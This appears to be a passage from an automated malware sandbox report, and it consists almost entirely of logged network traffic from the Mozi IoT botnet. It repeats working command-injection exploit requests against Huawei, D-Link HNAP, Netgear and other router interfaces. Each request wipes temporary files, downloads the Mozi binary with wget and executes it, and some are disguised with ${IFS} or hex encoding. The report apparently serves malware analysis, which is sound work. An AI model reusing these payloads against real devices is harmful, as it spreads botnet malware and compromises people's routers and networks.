3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 80.219.2.30:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 30.13.225.12:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 132.215.76.206:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 121.173.209.24:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 51.94.121.88:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 144.129.61.194:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 220.211.142.243:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l 